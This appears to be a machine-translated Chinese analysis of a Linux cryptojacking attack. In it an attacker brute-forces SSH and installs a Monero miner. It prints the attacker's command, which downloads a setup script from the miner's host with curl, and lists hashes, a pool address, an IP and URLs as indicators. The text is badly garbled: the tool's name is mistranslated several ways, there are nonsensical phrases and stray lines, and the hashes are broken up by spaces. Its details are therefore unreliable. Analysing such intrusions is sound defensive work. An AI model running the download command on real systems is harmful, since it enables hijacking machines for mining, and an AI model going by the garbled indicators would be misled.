恶劣矿工袭击事件分析

1,背景

最近观察到,在Linux下对挖掘进行了攻击。在攻击者通过SSH爆破获得许可后,他下载了Halyu矿工挖掘矿井,并对样本进行了深入分析韩宇矿工是一款专为不了解区块链的白人小用户设计的采矿软件。虚拟货币由计算机的中央处理器和图形处理器计算并统一转换成比特币。用户可以将采矿收益提取到支付宝,或者选择将硬币提取到比特币钱包。

目前,苛刻的矿工支持密码夜和伊沙什算法,可用于挖掘门罗和以太网广场等主流加密货币。此外,鲑鱼矿工已经率先支持门罗硬币的新的功率算法。它将自动无缝地切换到新算法,无需人工干预

2,示例简介

示例基本信息:

示例MD5内容get . sh 1 f17 b 8602739864 fe6 f 78d 34330d 9537脚本下载hasfishac 74 da 8 ea 28 BF 2146 b 069 E4 d 44 AE 0 64位挖掘管理程序hfxminer 64 337d 30665 c 902246 c 45 D8 C7 a5d详细分析:在

199攻击者通过SSH爆炸后,他们执行了CURL http://cli.hashfish.net/get.sh-o get . sh下载GET。上海脚本,其内容如下。该脚本的主要功能是根据系统版本下载相应的Haryu挖掘程序包并执行挖掘程序,手机指示挖掘用户,模式为模式

解析程序包时出现问题怎么办

通过在测试环境中执行脚本分析,发现攻击者的用户名为ph_r190HVKESk13exg=,矿井池为cn4.hfsvr.com:19891,门罗硬币被开采。开采

199公顷的鱼类称为hfxminer64。以下是流程状态

可以发现平均每秒可以执行30次哈希运算

3,相关io cmd 51 f 17 b 8602739864 Fe 6 f 78d 34330d 9537 AC 74 da 8 ea 28 BF 2146 b 069 E4 d 44d 44 AE 0337d 30665 c 902246 c 45 DC 8 C7 a5 d2dd 4 BC 242 . 88 . 44 . 188:6974 urhttp://cli.hashfish.net/get.sh: http://cli.hashfish.net/linux.tar.gz市其他平台测试结果:

大家都在看

相关专题